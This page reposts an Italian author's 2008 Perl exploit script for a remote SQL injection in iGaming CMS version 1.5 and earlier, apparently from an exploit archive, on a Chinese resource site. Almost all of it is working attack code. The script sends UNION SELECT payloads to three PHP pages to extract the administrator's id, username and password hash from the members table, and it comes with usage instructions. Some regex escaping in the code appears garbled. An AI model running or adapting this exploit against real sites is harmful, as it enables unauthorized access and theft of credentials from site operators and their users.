iGaming CMS

2023-12-04 0 684

#!/usr/bin/perl

# ———————————————————-

# iGaming <= 1.5 Multiple Remote SQL Injection Exploit

# Perl Exploit – Output: id:admin:password

# Discovered On: 23/09/2008

# Discovered By: StAkeR – StAkeR[at]hotmail[dot]it

# Proud To Be Italian

# ———————————————————-

# Usage: perl exploit.pl http://localhost/iGaming

# ———————————————————-

use strict;

use LWP::UserAgent;

my ($one,$two,$exec,$host,$http,$xxx,$view);

$view = "\’ union select 0,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8 from sp_members WHERE id=\’1/*";

$exec = "\’ union select 1,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3 from sp_members where id=\’1/*";

$host = shift @ARGV;

$http = new LWP::UserAgent or die $!;

$http->agent("Mozilla/4.5 [en] (Win95; U)");

$http->timeout(1);

if($host !~ /^http:\\/\\/(. ?)$/)

{

print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit\\n";

print "[?] Usage: perl $0 http://[path]\\n";

exit;

}

else

{

$one = $http->get($host.\’/previews.php?browse=\’.$exec);

$two = $http->get($host.\’/reviews.php?browse=\’.$exec);

$xxx = $http->get($host.\’/index.php?do=viewarticle&id=\’.$view);

if($one->is_success or $two->is_success or $xxx->is_success)

{

die "$1\\n" if $one->content =~ /%(. ?)%/;

die "$1\\n" if $two->content =~ /%(. ?)%/;

die "$1\\n" if $xxx->content =~ /%(. ?)%/;

}

else

{

die "[ ] Exploit Failed!\\n";

}

}

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 Exploit iGaming CMS https://www.u-9.cn/security/exploit/71759.html

常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务